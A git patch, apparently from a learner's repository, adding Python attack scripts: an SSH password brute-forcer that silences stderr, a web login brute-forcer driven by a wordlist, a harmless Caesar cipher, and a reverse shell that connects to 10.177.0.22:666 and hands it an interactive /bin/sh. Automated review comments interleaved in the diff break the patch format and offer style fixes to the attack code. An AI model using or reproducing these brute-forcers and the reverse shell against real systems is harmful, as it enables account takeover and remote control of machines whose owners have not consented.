From 67c94bcdabad901f1e690d373d30417847f8009c Mon Sep 17 00:00:00 2001
From: jerome
Date: Wed, 27 Dec 2023 17:47:12 +0100
Subject: ajouts
---
bruteSSH.py | 48 ++++++++++++++++++++++++++++++++++++++++++++++++
bruteWeb.py | 27 +++++++++++++++++++++++++++
bruteforce.py | 27 ---------------------------
cesar.py | 20 ++++++++++++++++++++
reverseshell.py | 8 ++++++++
5 files changed, 103 insertions(+), 27 deletions(-)
create mode 100644 bruteSSH.py
create mode 100644 bruteWeb.py
delete mode 100644 bruteforce.py
create mode 100644 cesar.py
create mode 100644 reverseshell.py
diff --git a/bruteSSH.py b/bruteSSH.py
new file mode 100644
index 0000000..9f2a001
--- /dev/null
+++ b/bruteSSH.py
@@ -0,0 +1,48 @@
+import sys
+import paramiko
+import socket
+import time
+import os
+
+# anything that running this program prints to stderr should be
+# redirected to /dev/null
+#
+os.dup2(os.open(os.devnull, os.O_WRONLY), 2)
+
+def is_ssh_open(hostname, username, password):
+ # initialize SSH client
+ client = paramiko.SSHClient()
+ # add to know hosts
+ client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+ try:
+ client.connect(hostname=hostname, username=username, password=password, timeout=3)
+ except socket.timeout:
+ # this is when host is unreachable
+ print(f"[!] Host: {hostname} is unreachable, timed out.")
+ return False
+ except paramiko.AuthenticationException:
+ print(f"[!] Invalid credentials for {username}:{password}")
+ return False
+ except paramiko.SSHException:
+ print(f"[*] Quota exceeded, retrying with delay...")
+ # sleep for a minute
+ time.sleep(60)
+ return is_ssh_open(hostname, username, password)
+ else:
+ # connection was established successfully
+ print(f"[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}")
+ return True
+
+
+if __name__ == "__main__":
+
+
+ with open(sys.argv[3]) as wordlist:
+ for password in wordlist.readlines():
+ password=password.strip("\n")
+ if password.startswith('#'):
+ pass
+ else:
+ if is_ssh_open(sys.argv[1], sys.argv[2], password) == True:
+ break
+
diff --git a/bruteWeb.py b/bruteWeb.py
new file mode 100644
index 0000000..541e673
--- /dev/null
+++ b/bruteWeb.py
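Review bot: In bruteSSH.py the module-level `os.dup2(os.open(os.devnull, os.O_WRONLY), 2)` discards stderr for the whole process, so a missing argument, an unreadable wordlist or any uncaught exception ends the run with no traceback, and the descriptor returned by `os.open` is never closed. If the aim is only to silence Paramiko's own messages, which it emits through the `logging` module, `logging.getLogger("paramiko").setLevel(logging.CRITICAL)` would quiet the library while keeping the script's errors visible. In `is_ssh_open` the comment `# add to know hosts` understates what `AutoAddPolicy` does: it accepts whatever host key is presented, so the password is sent to whichever server answers at that address. The comment should read `# accept any host key without verification (server is not authenticated)`.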
@@ -0,0 +1,27 @@
+import sys
+import requests
+
+def bruteforce(url,username,password):
+ reponse=requests.post(url=url,data={
+ "username":username,
+ "password":password
+ })
+ #print(reponse.text)
+ if "Mauvais mot de passe" in reponse.text:
+ #print("mauvais pwd")
+ return False
+ else:
+ print(f"Trouvé password \"{password}\"")
+ return True
+
+if __name__ == "__main__":
+ url = sys.argv[1]
+ dico = sys.argv[2]
+ with open(dico, 'r') as wordlist:
+ for password in wordlist.readlines():
+ password=password.strip()
+ if bruteforce(url,"jerome",password)==True:
+ sys.exit()
+
+#bruteforce("http://localhost/page.php","jerome","secret")
+
diff --git a/bruteforce.py b/bruteforce.py
deleted file mode 100644
index 541e673..0000000
--- a/bruteforce.py
+++ /dev/null
@@ -1,27 +0,0 @@
-import sys
-import requests
-
-def bruteforce(url,username,password):
- reponse=requests.post(url=url,data={
- "username":username,
- "password":password
- })
- #print(reponse.text)
- if "Mauvais mot de passe" in reponse.text:
- #print("mauvais pwd")
- return False
- else:
- print(f"Trouvé password \"{password}\"")
- return True
-
-if __name__ == "__main__":
- url = sys.argv[1]
- dico = sys.argv[2]
- with open(dico, 'r') as wordlist:
- for password in wordlist.readlines():
- password=password.strip()
- if bruteforce(url,"jerome",password)==True:
- sys.exit()
-
-#bruteforce("http://localhost/page.php","jerome","secret")
-
diff --git a/cesar.py b/cesar.py
new file mode 100644
index 0000000..ca6fb12
--- /dev/null
+++ b/cesar.py
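Review bot: In bruteWeb.py `requests.post` is called without a `timeout`, and requests applies none by default, so a single unresponsive server blocks the loop indefinitely; add an explicit keyword to the call, e.g. `timeout=5`. `sys.argv[1]` and `sys.argv[2]` are read with no length check, so a run without arguments fails with a bare IndexError rather than a usage message. The comparison `bruteforce(url,"jerome",password)==True` is redundant for a function that returns a bool; `if bruteforce(url,"jerome",password):` says the same thing.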
@@ -0,0 +1,20 @@
+liste=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
+
+def decalage(lettre,liste,clef):
+ for i in range(len(liste)):
+ if lettre not in liste:
+ return lettre
+ elif lettre==liste[i]:
+ return str(liste[i+clef])
+
+message_chiffre = str()
+while True:
+ message = input('Entrez le texte à chiffrer (q pour quitter) : ')
+ if message == "q" or message =="Q":
+ print("bye")
+ exit()
+ clef = int(input('Entrez votre clef : '))
+ for lettre in message:
+ message_chiffre += decalage(lettre,liste,clef)
+ print(message_chiffre)
+ message_chiffre=""
diff --git a/reverseshell.py b/reverseshell.py
new file mode 100644
index 0000000..283486e
--- /dev/null
+++ b/reverseshell.py
@@ -0,0 +1,8 @@
+import socket,subprocess,os
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("10.177.0.22",666))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+p=subprocess.call(["/bin/sh","-i"])
+
-- cgit v1.2.3
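Review bot: In cesar.py `decalage` indexes `liste[i+clef]` with the raw key, so the doubled-alphabet table is only correct for keys 0 to 26. A larger key moves a lowercase letter into the uppercase half or raises IndexError on an uppercase one, and a negative key wraps to the end of the list (`'a'` with key -1 yields `'Z'`). Reducing the key once where it is read, `clef = int(input('Entrez votre clef : ')) % 26`, keeps every lookup inside the matching half. The `lettre not in liste` test does not depend on `i` and can move above the `for` loop.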
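Review bot: reverseshell.py carries no comment or docstring, so nothing in the file says that it opens an outbound TCP connection to the hard-coded `10.177.0.22:666` and attaches an interactive `/bin/sh` to it. A header comment such as `# Reverse shell: connects to a fixed listener and runs /bin/sh -i with fds 0, 1 and 2 duplicated onto the socket` would state that for anyone auditing the repository. A shell whose three standard descriptors are one network socket is also the trait that process telemetry typically matches on, which is worth recording in the same comment. The return code bound to `p` is never read, so the assignment can be dropped.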